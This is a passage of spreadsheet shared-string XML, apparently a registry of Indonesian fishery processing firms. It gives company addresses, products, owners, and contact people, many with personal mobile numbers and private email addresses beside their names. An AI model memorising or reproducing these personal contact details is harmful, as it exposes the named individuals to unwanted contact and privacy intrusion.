    <t>Ikan Demersal Beku, Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>TRI WIJAYANTO</t>
  </si>
  <si>
    <t>hasilmelimpah168@yahoo.co.id</t>
  </si>
  <si>
    <t>PT. DEHO CANNING COMPANY</t>
  </si>
  <si>
    <t>Jl. Raya Madidir, Kel. Paceda, Kec. Madidir, Kota Bitung</t>
  </si>
  <si>
    <t>Kaleng, Beku, Segar</t>
  </si>
  <si>
    <t>Tuna Kaleng, Tuna Beku, Tuna Loin Masak Beku, Tuna Loin Segar, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Ali Wibisono</t>
  </si>
  <si>
    <t>Madidir</t>
  </si>
  <si>
    <t>Paceda</t>
  </si>
  <si>
    <t>dehopro@gmail.com</t>
  </si>
  <si>
    <t>0438-21390</t>
  </si>
  <si>
    <t>Ruth Barik / 085298129737</t>
  </si>
  <si>
    <t>Sunardi Nugraha</t>
  </si>
  <si>
    <t>PT. KELOLA MINA LAUT UNIT LOBUK</t>
  </si>
  <si>
    <t>Desa Lobuk, Kel. Lobuk, Kec. Bluto, Kabupaten Sumenep</t>
  </si>
  <si>
    <t>Udang Kering, Himego Kering, Teri Asin Kering, Daging Rajungan Rebus Dingin, Telur Ikan Terbang Kering</t>
  </si>
  <si>
    <t>PT. Kelola Mina Laut</t>
  </si>
  <si>
    <t>Bluto</t>
  </si>
  <si>
    <t>Lobuk</t>
  </si>
  <si>
    <t>nanda@kmlseafood.com</t>
  </si>
  <si>
    <t>Dhimas Wahyu Prasetya</t>
  </si>
  <si>
    <t>Eka Taruna</t>
  </si>
  <si>
    <t>PT. REMBANG SPORTINDO MANDIRI</t>
  </si>
  <si>
    <t>Kawasan Industri Pergudangan &amp; Industri Tunas Bitung Blok B2 No.5 Jl. Raya Serang KM 13,8, Kel. Pasirjaya, Kec. Cikupa, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Segar, Ikan Pelagis Segar, Hiu Beku, Tuna Beku, Cephalopoda Segar, Ikan Demersal Beku, Ikan Pelagis Beku, Daging Tuna Beku</t>
  </si>
  <si>
    <t>Muhammad Nur Achlis</t>
  </si>
  <si>
    <t>Pasirjaya</t>
  </si>
  <si>
    <t>wewebpmhp@yahoo.co.id</t>
  </si>
  <si>
    <t>Suyadi 08532596535</t>
  </si>
  <si>
    <t>Suyadi &amp; 08532596535</t>
  </si>
  <si>
    <t>Suyadi</t>
  </si>
  <si>
    <t>CV. BRIGHTFOOD RIUNG GUNUNG</t>
  </si>
  <si>
    <t>Jl. Cikadut Atas No.33 RT 03 RW 05, Kel. Karang Pamulang, Kec. Mandalajati, Kota Bandung</t>
  </si>
  <si>
    <t>Yoghurt Rumput Laut, Produk Perikanan Bernilai Tambah Beku</t>
  </si>
  <si>
    <t>Muhamad Aji Budiyanto</t>
  </si>
  <si>
    <t>Mandalajati</t>
  </si>
  <si>
    <t>Karang Pamulang</t>
  </si>
  <si>
    <t>brightcorp33@gmail.com</t>
  </si>
  <si>
    <t>Muhamad Aji Budiyanto / 082215187391</t>
  </si>
  <si>
    <t>Budi</t>
  </si>
  <si>
    <t>CV. CAMAR LAUT</t>
  </si>
  <si>
    <t>Gorontalo</t>
  </si>
  <si>
    <t>Jl. Raja Wadi Polapa, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo</t>
  </si>
  <si>
    <t>IDRIS NTESEO</t>
  </si>
  <si>
    <t>Tilango</t>
  </si>
  <si>
    <t>Dulomo</t>
  </si>
  <si>
    <t>camarlaut.gorontalo@gmail.com</t>
  </si>
  <si>
    <t>IDRIS NTESEO / 081356406741</t>
  </si>
  <si>
    <t>PT. SINAR BAHARI AGUNG</t>
  </si>
  <si>
    <t>Jl. Raya Kendal - Batang Km 12, Kel. Truko, Kec. Kangkung, Kabupaten Kendal</t>
  </si>
  <si>
    <t>METY</t>
  </si>
  <si>
    <t>Kangkung</t>
  </si>
  <si>
    <t>Truko</t>
  </si>
  <si>
    <t>zia_nf@yahoo.com</t>
  </si>
  <si>
    <t>0294-387520</t>
  </si>
  <si>
    <t>FAUZIA NUR FAJAR, ST</t>
  </si>
  <si>
    <t>CV. GOLDEN KK</t>
  </si>
  <si>
    <t>Jl. Baru Tugu Adipura No.9, Kel. Paniki Bawah, Kec. Mapanget, Kota Manado</t>
  </si>
  <si>
    <t>IBRAHIM MOCHTAR</t>
  </si>
  <si>
    <t>Mapanget</t>
  </si>
  <si>
    <t>Paniki Bawah</t>
  </si>
  <si>
    <t>sulutdkp@ymail.com</t>
  </si>
  <si>
    <t xml:space="preserve">IBRAHIM </t>
  </si>
  <si>
    <t>PT. SARI NUSA SEJATI</t>
  </si>
  <si>
    <t>Banjar Dinas Mawar, Kel. Tukad Sumaga, Kec. Gerokgak, Kabupaten Buleleng</t>
  </si>
  <si>
    <t>Tuna Segar, Ikan Pelagis Segar, Ikan Demersal Segar</t>
  </si>
  <si>
    <t>I PUTU BIASA</t>
  </si>
  <si>
    <t>Gerokgak</t>
  </si>
  <si>
    <t>Tukad Sumaga</t>
  </si>
  <si>
    <t>ptsarinusasejati@gmail.com</t>
  </si>
  <si>
    <t>Dwi 0895368806444</t>
  </si>
  <si>
    <t>Jl. Veteran KM 02, Kel. Dirgahayu, Kec. Pulau Laut Utara, Kabupaten Kota Baru</t>
  </si>
  <si>
    <t>budiyono hiu</t>
  </si>
  <si>
    <t>Pulau Laut Utara</t>
  </si>
  <si>
    <t>Dirgahayu</t>
  </si>
  <si>
    <t>wakhit.h@gmail.com</t>
  </si>
  <si>
    <t>wakhit handoko</t>
  </si>
  <si>
    <t>joyo supeno</t>
  </si>
  <si>
    <t>PT. LAUTAN BAHARI SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Muara Baru, Perum PPSJ Pelabuhan Nizam Zachman Blok J No.7, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku, Tuna Segar, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Ang Benny Shawpindo</t>
  </si>
  <si>
    <t>021-6623526</t>
  </si>
  <si>
    <t>Kumedi 081318035445</t>
  </si>
  <si>
    <t>PT. INDO BALI</t>
  </si>
  <si>
    <t>Jl. Raya Pengambengan, Kel. Tegalbadeng Barat, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Sarden Kaleng</t>
  </si>
  <si>
    <t>Singgih Tandiono</t>
  </si>
  <si>
    <t>Tegalbadeng Barat</t>
  </si>
  <si>
    <t>indobalijembrana@yahoo.com</t>
  </si>
  <si>
    <t>0365-41871</t>
  </si>
  <si>
    <t>Bambang S.Adidarsono/081234560913</t>
  </si>
  <si>
    <t>Bambang S.Adidarsono</t>
  </si>
  <si>
    <t>PT. HOKKIE SAMUDRA TRIJAYA</t>
  </si>
  <si>
    <t>Jl. Muara Baru Dermaga Timur Transit RT 20 RW 17, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t xml:space="preserve">HERY KURNIAWAN </t>
  </si>
  <si>
    <t>nila.hst@gmail.com</t>
  </si>
  <si>
    <t>021-6620412</t>
  </si>
  <si>
    <t>BRAMASTYA KHRESNA PAKSI. 082112551664</t>
  </si>
  <si>
    <t>HERY KURNIAWAN</t>
  </si>
  <si>
    <t>PT. YOBEL UTAMA SEAFOOD INDONESIA</t>
  </si>
  <si>
    <t>Jl. Keramat Basirih No.36, Kel. Basirih, Kec. Banjarmasin Barat, Kota Banjarmasin</t>
  </si>
  <si>
    <t>Teripang Kering, Udang Beku</t>
  </si>
  <si>
    <t>Rio Oerip Perkoso</t>
  </si>
  <si>
    <t>Basirih</t>
  </si>
  <si>
    <t>yusiseafood@gmail.com</t>
  </si>
  <si>
    <t>0511-3356506</t>
  </si>
  <si>
    <t>Satria Utomo - 0811500484</t>
  </si>
  <si>
    <t>Satria Utomo</t>
  </si>
  <si>
    <t>PT. ISTANA CIPTA SEMBADA</t>
  </si>
  <si>
    <t>Jl. Raya Labanasem, Kel. Labanasem, Kec. Kabat, Kabupaten Banyuwangi</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku, Udang Rebus Beku, Ikan Hasil Budidaya Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Firdaus Rahman Moeslim</t>
  </si>
  <si>
    <t>Kabat</t>
  </si>
  <si>
    <t>Labanasem</t>
  </si>
  <si>
    <t>dcr.bwi@ics-seafood.com</t>
  </si>
  <si>
    <t>Erma Pusparini/08221</t>
  </si>
  <si>
    <t>Sulistyanto</t>
  </si>
  <si>
    <t>PT. AWINDO MAKMUR SEJAHTERA</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No. 8 Muara Baru, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Bandeng Beku, Tuna Beku, Ikan Pelagis Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>hasni@awindointernational.com</t>
  </si>
  <si>
    <t>Setyaningrum  083879539133</t>
  </si>
  <si>
    <t>RUSTIAN</t>
  </si>
  <si>
    <t>PT. NUANSA GUNA UTAMA</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 (Room 3.2, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Kerang Segar, Cephalopoda Segar, Kepiting Segar</t>
  </si>
  <si>
    <t>IR. SORAYA KUSUMA EFFENDY</t>
  </si>
  <si>
    <t>Duren Sawit</t>
  </si>
  <si>
    <t>Pondok Bambu</t>
  </si>
  <si>
    <t>nuansagunautama@gmail.com</t>
  </si>
  <si>
    <t>DIAN WULANDARI / 081280140041</t>
  </si>
  <si>
    <t>HILDA IRANY EFFENDY</t>
  </si>
  <si>
    <t>CV. SURYA CEMERLANG ABADI</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 Gudang A.3.1, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Salmon Segar, Kerang Segar</t>
  </si>
  <si>
    <t>Irwanto</t>
  </si>
  <si>
    <t>sys@cvsurya.com</t>
  </si>
  <si>
    <t>Jimmy Rumawas</t>
  </si>
  <si>
    <t>Priyoto</t>
  </si>
  <si>
    <t>POKHLASARSARIRASA</t>
  </si>
  <si>
    <t>Kalimantan Tengah</t>
  </si>
  <si>
    <t>Jl. Swadaya, Kel. Sungai Kapitan, Kec. Kumai, Kabupaten Kotawaringin Barat</t>
  </si>
  <si>
    <t>Amplang Ikan, Stik Ikan, Kerupuk Ikan</t>
  </si>
  <si>
    <t>syarifah salmah</t>
  </si>
  <si>
    <t>Kumai</t>
  </si>
  <si>
    <t>Sungai Kapitan</t>
  </si>
  <si>
    <t>randiowo@gmail.com</t>
  </si>
  <si>
    <t>syarifah salmah,082157222528</t>
  </si>
  <si>
    <t>CV. CAHAYA KARYA INDAH</t>
  </si>
  <si>
    <t>Jl. Taruna No.8 RT 002 RW 004 Gudang A.5, Kel. Pondok Bambu, Kec. Duren Sawit, Kota Jakarta Timur</t>
  </si>
  <si>
    <t>Salmon Segar, Trout Segar, Salmon Beku, Trout Beku, Kerang Segar, Kerang Beku, Cephalopoda Segar, Cephalopoda Beku, Kepiting Beku</t>
  </si>
  <si>
    <t>IR. Soraya Kusuma Effendy</t>
  </si>
  <si>
    <t>sys@cvcahaya.com</t>
  </si>
  <si>
    <t>ERI HARYANTI / 08187</t>
  </si>
  <si>
    <t>Khoirulloh</t>
  </si>
  <si>
    <t>MYDEA FOOD</t>
  </si>
  <si>
    <t>Kemusuk Kidul RT 01, Kel. Argomulyo, Kec. Sedayu, Kabupaten Bantul</t>
  </si>
  <si>
    <t>Lashmy Utami</t>
  </si>
  <si>
    <t>Sedayu</t>
  </si>
  <si>
    <t>Argomulyo</t>
  </si>
  <si>
    <t>mideafood@outlook.com</t>
  </si>
  <si>
    <t>Lashmy Utami &amp; 08122</t>
  </si>
  <si>
    <t>PT. MANADO MAJU SARANA LOGISTIK</t>
  </si>
  <si>
    <t>Desa Paniki Atas Jaga IV, Kec. Talawaan, Kabupaten Minahasa Utara</t>
  </si>
  <si>
    <t>Segar, Lainnya, Beku</t>
  </si>
  <si>
    <t>Kepiting Segar, Kepiting Hidup, Kepiting Beku, Lobster Hidup, Lobster Beku, Lobster Segar, Tuna Beku, Ikan Demersal Segar, Ikan Demersal Hidup, Tuna Segar, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Bong chandra</t>
  </si>
  <si>
    <t xml:space="preserve">Talawaan </t>
  </si>
  <si>
    <t xml:space="preserve">Mapanget Atas </t>
  </si>
  <si>
    <t>kevin_egam@qq.com</t>
  </si>
  <si>
    <t>Kevin</t>
  </si>
  <si>
    <t xml:space="preserve">Bong Chandra </t>
  </si>
  <si>
    <t>PT. SYAM SURYA MANDIRI</t>
  </si>
  <si>
    <t>Jl. Propinsi No.01 Kampung Kajang, Kel. Sungai Mariam, Kec. Anggana, Kabupaten Kutai Kartanegara</t>
  </si>
  <si>
    <t>H.MANGKANA</t>
  </si>
  <si>
    <t>Anggana</t>
  </si>
  <si>
    <t>Sungai Mariam</t>
  </si>
  <si>
    <t>dyazhari89@yahoo.com</t>
  </si>
  <si>
    <t>0541-682237</t>
  </si>
  <si>
    <t>DEDY AZHARI 08563355740</t>
  </si>
  <si>
    <t>DEDY AZHARI</t>
  </si>
  <si>
    <t>PT. SARANA TANI PRATAMA</t>
  </si>
  <si>
    <t>Jl. KUD Mina Karya Dsn Kelapan Balian, Kel. Pengambengan, Kec. Negara, Kabupaten Jembrana</t>
  </si>
  <si>
    <t>Kaleng, Reduksi</t>
  </si>
  <si>
    <t>Sarden Kaleng, Tepung Ikan</t>
  </si>
  <si>
    <t>WIDJAJA PUTRA TJOEK</t>
  </si>
  <si>
    <t>ratnatw33@gmail.com</t>
  </si>
  <si>
    <t>RATNA TIRTAWATI (081335090808)</t>
  </si>
  <si>
    <t>SUNARTO ABUBAKAR</t>
  </si>
  <si>
    <t>PT. PERIKANAN NUSANTARA (PERSERO) UNIT MUARA BARU</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Komplek P2HP/PSDKP, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku, Ikan Air Tawar Beku, Tuna Beku, Udang Beku</t>
  </si>
  <si>
    <t xml:space="preserve">Badan Usaha Milik Negara </t>
  </si>
  <si>
    <t>perikanannusantara.qa@gmail.com</t>
  </si>
  <si>
    <t>021-6332162</t>
  </si>
  <si>
    <t>Ema Tri Ratnasari (081298001914)</t>
  </si>
  <si>
    <t>PT. PUTRI INDAH</t>
  </si>
  <si>
    <t>Jl. Pelabuhan Perikanan Samudera Belawan Gabion No.8, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Udang Beku</t>
  </si>
  <si>
    <t>Lily Chanaka</t>
  </si>
  <si>
    <t>Medan Belawan</t>
  </si>
  <si>
    <t>Bagan Deli</t>
  </si>
  <si>
    <t>ricardosimanjuntak@ptputriindah.net</t>
  </si>
  <si>
    <t>061-6944430, 061-6944431</t>
  </si>
  <si>
    <t>Ricardo Simanjuntak 081365393557</t>
  </si>
  <si>
    <t>Jessica Halim</t>
  </si>
  <si>
    <t>PT. DIMAS REIZA PERWIRA</t>
  </si>
  <si>
    <t>Jl. Rungkut Industri III/34, Kel. Kutisari, Kec. Tenggilis Mejoyo, Kota Surabaya</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku, Bandeng Beku, Ikan Hasil Budidaya Beku, Kerang Beku, Tuna Beku, Bandeng Tanpa Duri Beku, Tuna Loin Beku, Fillet Patin Beku, Fillet Ikan Demersal Beku</t>
  </si>
  <si>
    <t>Magghfur Ali Mustofa</t>
  </si>
  <si>
    <t>Kutisari</t>
  </si>
  <si>
    <t>denok.kumalasari.275@gmail.com</t>
  </si>
  <si>
    <t>Erlina &amp; 082141612996</t>
  </si>
  <si>
    <t>Bambang Kusdiono</t>
  </si>
  <si>
    <t>PT. KARYA MANDIRI CITRAMINA</t>
  </si>
  <si>
    <t>Jl. Cumi Raya No.5 Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Tuna Beku</t>
  </si>
  <si>
    <t>Suryanto</t>
  </si>
  <si>
    <t>Muara Baru</t>
  </si>
  <si>
    <t>qc.kmcgroup@gmail.com</t>
  </si>
  <si>
    <t>Suryanto 08127170988</t>
  </si>
  <si>
    <t>Ady Surya</t>
  </si>
  <si>
    <t>PT. BALI MINA UTAMA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Raya Timur No.3, Pelabuhan Benoa, Kel. Pedungan, Kec. Denpsar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Tuna Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t>Chen Lai Wang</t>
  </si>
  <si>
    <t>Denpsar Selatan</t>
  </si>
  <si>
    <t>baliminautama@gmail.com</t>
  </si>
  <si>
    <t>0361-7237294</t>
  </si>
  <si>
    <t>Mediani Setianingsih</t>
  </si>
  <si>
    <t>PT. LINTAS ANTAR NUSA</t>
  </si>
  <si>
    <t>Desa Aeng Batu-Batu, Kec. Galesong Utara, Kabupaten Takalar</t>
  </si>
  <si>
    <t>Kering, Beku, Segar</t>
  </si>
  <si>
    <t>Telur Ikan Terbang Kering, Telur Ikan Terbang Beku, Ikan Demersal Beku, Ikan Pelagis Beku, Ikan Pelagis Segar, Ikan Demersal Segar, Cephalopoda Beku, Cephalopoda Segar</t>
  </si>
  <si>
    <t>SHIGENOBU FUJIOKA</t>
  </si>
  <si>
    <t>Galesong Utara</t>
  </si>
  <si>
    <t>Aeng Batu-Batu</t>
  </si>
  <si>
    <t>mksr.lan1@yahoo.co.id</t>
  </si>
  <si>
    <t>adriana &amp; 085255600253</t>
  </si>
  <si>
    <t>SHIGERANI NATALIA</t>
  </si>
  <si>
    <t>PT. AWINDO</t>
  </si>
  <si>
    <t>Jl. Area Galangan Kapal, Kawasan PPS Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>fitri@awindointernational.com</t>
  </si>
  <si>
    <t>cindy 082388116520</t>
  </si>
  <si>
    <t>CV. FANIA FOOD</t>
  </si>
  <si>
    <t>Jl. Gedongan Baru II No.14, Kel. Pelemwulung, Kec. Banguntapan, Kota Yogyakarta</t>
  </si>
  <si>
    <t>Bandeng Duri Lunak, Produk Perikanan Bernilai Tambah Beku, Otak-Otak Bandeng</t>
  </si>
  <si>
    <t>Hani Kusdaryanti</t>
  </si>
  <si>
    <t>Banguntapan</t>
  </si>
  <si>
    <t>Pelemwulung</t>
  </si>
  <si>
    <t>hanifaniafood@gmail.com</t>
  </si>
  <si>
    <t>Hani Kusdaryanti &amp; 0</t>
  </si>
  <si>
    <t>PT. USAHA CENTRALJAYA SAKTI</t>
  </si>
  <si>
    <t>Jl. Kima V Kav E No.3A , Kel. Daya, Kec. Biringkannaya, Kota Makassar</t>
  </si>
  <si>
    <t>Cephalopoda Segar, Ikan Pelagis Segar, Ikan Pelagis Beku, Rumput Laut Kering, Udang Kipas Beku, Udang Segar, Udang Beku, Telur Ikan Terbang Kering, Tuna Beku, Tuna Segar, Ikan Demersal Beku, Ikan Demersal Segar, Cephalopoda Beku, Bandeng Beku</t>
  </si>
  <si>
    <t>Merry chandra</t>
  </si>
  <si>
    <t>Biringkannaya</t>
  </si>
  <si>
    <t>centraljaya38@yahoo.co.id</t>
  </si>
  <si>
    <t>0411-514781</t>
  </si>
  <si>
    <t xml:space="preserve"> Haswin tanaratu 0821</t>
  </si>
  <si>
    <t>PT. TUNA PERMATA REZEKI</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung, Kompleks PPSJ Transit 20, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Tuna Segar, Bandeng Beku, Tuna Beku, Cephalopoda Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>siti@pttuna.com</t>
  </si>
  <si>
    <t>021-6683357</t>
  </si>
  <si>
    <t>081372817770, Wati 081319503682</t>
  </si>
  <si>
    <t>PT. TIGAKA DISTRINDO PERKASA</t>
  </si>
  <si>
    <t>Jl. Johar Blok F8/7 Delta Silicon 3 Lippo Cikarang, Kel. Cicau, Kec. Cikarang Pusat, Kabupaten Bekasi</t>
  </si>
  <si>
    <t>Minyak Krill</t>
  </si>
  <si>
    <t>Thomas Ricky Harsono</t>
  </si>
  <si>
    <t xml:space="preserve">Cicau </t>
  </si>
  <si>
    <t>yafetip@gmail.com</t>
  </si>
  <si>
    <t>021-89911019</t>
  </si>
  <si>
    <t>Bpk. Indah Purwanta</t>
  </si>
  <si>
    <t>PT. SUMBER JAYA BUMI LESTARI</t>
  </si>
  <si>
    <t>Jl. Daan Mogot Km 17 No.40, Kel. Kalideres, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>RUDY</t>
  </si>
  <si>
    <t>sumberjayabl@gmail.com</t>
  </si>
  <si>
    <t>021-5418033</t>
  </si>
  <si>
    <t>SUWANDI 0816949131</t>
  </si>
  <si>
    <t>SUWANDI</t>
  </si>
  <si>
    <t>PT. LAUTAN PURNAMA INTERNUSA</t>
  </si>
  <si>
    <t>Pluit Timur Blok C Timur No.11, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Cephalopoda Segar, Cephalopoda Beku</t>
  </si>
  <si>
    <t>LIM RATNA SARI</t>
  </si>
  <si>
    <t>lim_ratnasari@yahoo.co.id</t>
  </si>
  <si>
    <t>021-6606470</t>
  </si>
  <si>
    <t>PT. CITRARAJA AMPAT CANNING</t>
  </si>
  <si>
    <t>Papua Barat</t>
  </si>
  <si>
    <t>Jl. Ahmad Yani Klademak I, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong</t>
  </si>
  <si>
    <t>Beku, Kaleng, Segar</t>
  </si>
  <si>
    <t>Tuna Loin Beku, Tuna Kaleng, Tuna Loin Segar, Tuna Loin Masak Beku, Ikan Pelagis Beku</t>
  </si>
  <si>
    <t xml:space="preserve">ALI WIBISONO </t>
  </si>
  <si>
    <t>Sorong Manoi</t>
  </si>
  <si>
    <t>Klaligi</t>
  </si>
  <si>
    <t>diane_sumendap@yahoo.co.id</t>
  </si>
  <si>
    <t>0951 322576</t>
  </si>
  <si>
    <t xml:space="preserve">DIANE SUMENDAP </t>
  </si>
  <si>
    <t>ALI WIBISONO</t>
  </si>
  <si>
    <t>PT. SAMUDERA SEJAHTERA SENTOSA</t>
  </si>
  <si>
    <t>Jl. Dermaga Muara Angke No.8, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Telur Ikan Beku, Ikan Pelagis Beku, Ikan Demersal Beku</t>
  </si>
  <si>
    <t>JONPAUL</t>
  </si>
  <si>
    <t>ptsssentosa@yahoo.com</t>
  </si>
  <si>
    <t>LIDYA/082112170478</t>
  </si>
  <si>
    <t>TAUFIK NUR</t>
  </si>
  <si>
    <t>PT. ARTA MINA JAYA</t>
  </si>
  <si>
    <t>Jl. Poros Wandoka Lingkungan Antapia, Kel. Wandoka Utara, Kec. Wangi-wangi, Kabupaten Wakatobi</t>
  </si>
  <si>
    <t>Tuna Segar, Tuna Beku, Ikan Demersal Beku, Ikan Demersal Segar, Ikan Pelagis Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>Gunawan</t>
  </si>
  <si>
    <t>Wangi-wangi</t>
  </si>
  <si>
    <t>Wandoka Utara</t>
  </si>
  <si>
    <t>waldymayani@gmail.com</t>
  </si>
  <si>
    <t>Cahaya &amp; 081296939910</t>
  </si>
  <si>
    <t>Roedyanto</t>
  </si>
  <si>
    <t>PT. KARYA SEGARINDO PRATAMA</t>
  </si>
  <si>
    <t>Pergudangan 88, Jl. Pesing Poglar No.76A, Kel. Kedaung Kali Angke, Kec. Cengkareng, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>EDI PRAYITNO</t>
  </si>
  <si>
    <t>Kedaung Kali Angke</t>
  </si>
  <si>
    <t>karindo_ksp@yahoo.com</t>
  </si>
  <si>
    <t>021-54361349</t>
  </si>
  <si>
    <t>WEI LI 08119512088</t>
  </si>
  <si>
    <t>PT. CAHAYA CEMERLANG</t>
  </si>
  <si>
    <t>Jl. Prof. Dr. Ir. Sutami No.22, Kel. Tamalanrea, Kec. Biringkanaya, Kota Makassar</t>
  </si>
  <si>
    <t>Tepung Karaginan, Chips Karaginan</t>
  </si>
  <si>
    <t>ALFRED TANDRA</t>
  </si>
  <si>
    <t>bayukima07@yahoo.com</t>
  </si>
  <si>
    <t>0411-515344</t>
  </si>
  <si>
    <t>BAHARUDDIN 08114198885</t>
  </si>
  <si>
    <t>BAHARUDDIN</t>
  </si>
  <si>
    <t>PT. INDOMAGURO TUNAS UNGGUL</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok G1-2, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Lobster Air Tawar Segar, Lobster Air Tawar Beku, Udang Segar, Udang Beku, Lobster Segar, Lobster Beku, Kerang Segar, Kerang Beku, Telur Ikan Segar, Telur Ikan Beku, Bulu Babi Segar, Bulu Babi Beku, Salmon Segar, Salmon Beku, Cephalopoda Segar, Cephalopoda Beku, Tuna Segar, Tuna Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Udang Kipas Segar, Udang Kipas Beku</t>
  </si>
  <si>
    <t>MR TJANDRA</t>
  </si>
  <si>
    <t>qc@indomaguro.co.id</t>
  </si>
  <si>
    <t>021-29263588</t>
  </si>
  <si>
    <t>MARTINI 087777178557</t>
  </si>
  <si>
    <t>MR ARIS BUDI P</t>
  </si>
  <si>
    <t>PT. LAUTAN MAKMUR SENTOSA</t>
  </si>
  <si>
    <t>Komplek Workshop PHPT Kav 5 Muara Angke, Kel. Pluit, Kec. Penjaringan , Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Pelagis Beku, Ikan Demersal Beku, Telur Ikan Beku</t>
  </si>
  <si>
    <t>HARNOTO</t>
  </si>
  <si>
    <t>ptlmsentosa@yahoo.com</t>
  </si>
  <si>
    <t>LENI/081380557789</t>
  </si>
  <si>
    <t>PT. GILONTAS INDONESIA</t>
  </si>
  <si>
    <t>Jl. Ikan Tuna Barat No.81 Pelabuhan Benoa, Kel. Pedungan, Kec. Denpasar Selatan, Kota Denpasar</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar, Ikan Pelagis Beku, Tuna Segar, Tuna Beku</t>
  </si>
  <si>
    <t>Tsai Lung Cieh</t>
  </si>
  <si>
    <t>indrahariyoko05@gmail.com</t>
  </si>
  <si>
    <t>722014/7</t>
  </si>
  <si>
    <t>Dewa Ayu Sukma Wardani 085739283900</t>
  </si>
  <si>
    <t>Lin Cho Hsun dan I Nyoman Konten</t>
  </si>
  <si>
    <t>PT. BAHARI ANDALAN PRATAMA</t>
  </si>
  <si>
    <t>Jl. Raya Perancis Komplek Pergudangan Kosambi Permai Blok O No.1 (Room 1), Kel. Jatimulya, Kec. Kosambi, Kabupaten Tangerang</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku, Ikan Demersal Beku, Cephalopoda Beku</t>
  </si>
  <si>
    <t>MARIATI</t>
  </si>
  <si>
    <t>bahariap7@gmail.com</t>
  </si>
  <si>
    <t>021-29031222</t>
  </si>
  <si>
    <t>ahmad &amp; 08221342811</t>
  </si>
  <si>
    <t>ST.MISNA AULIA KASRUDDIN</t>
  </si>
  <si>
    <t>PT. INTRASINDO</t>
  </si>
  <si>
    <t>Harapan Baru Regency C-1/9 RT 003 RW 014, Kel. Kota Baru, Kec. Bekasi Barat, Kota Bekasi</t>
  </si>
  <si>
    <t>Tepung Karaginan</t>
  </si>
  <si>
    <t>Irma Handayani</t>
  </si>
  <si>
    <t>Bekasi Barat</t>
  </si>
  <si>
    <t>Kota Baru</t>
  </si>
  <si>
    <t>bobby.rey@intrasindo.co.id</t>
  </si>
  <si>
    <t>021-86611185</t>
  </si>
  <si>
    <t>Irma Handayani / Surya 085218116656</t>
  </si>
  <si>
    <t>PT. PARLEVLIET PARABA SEAFOOD</t>
  </si>
  <si>
    <t>Jl. Jembatan Tua No.89, Kel. Bontoa, Kec. Mandai, Kabupaten Maros</t>
  </si>
  <si>
    <t>Cephalopoda Beku, Tuna Beku, Tuna Segar, Ikan Pelagis Beku, Ikan Demersal Segar, Ikan Demersal Beku, Ikan Pelagis Segar</t>
  </si>
  <si>
    <t>Jumarto</t>
  </si>
  <si>
    <t>Mandai</t>
  </si>
  <si>
    <t>Bontoa</t>
  </si>
  <si>
    <t>info@parlevlietparabaseafood.com</t>
  </si>
  <si>
    <t>Jumarto &amp; 0852994723</t>
  </si>
  <si>
    <t>PT. MARINA LAUTAN SEJAHTERA FISHERY</t>
  </si>
  <si>
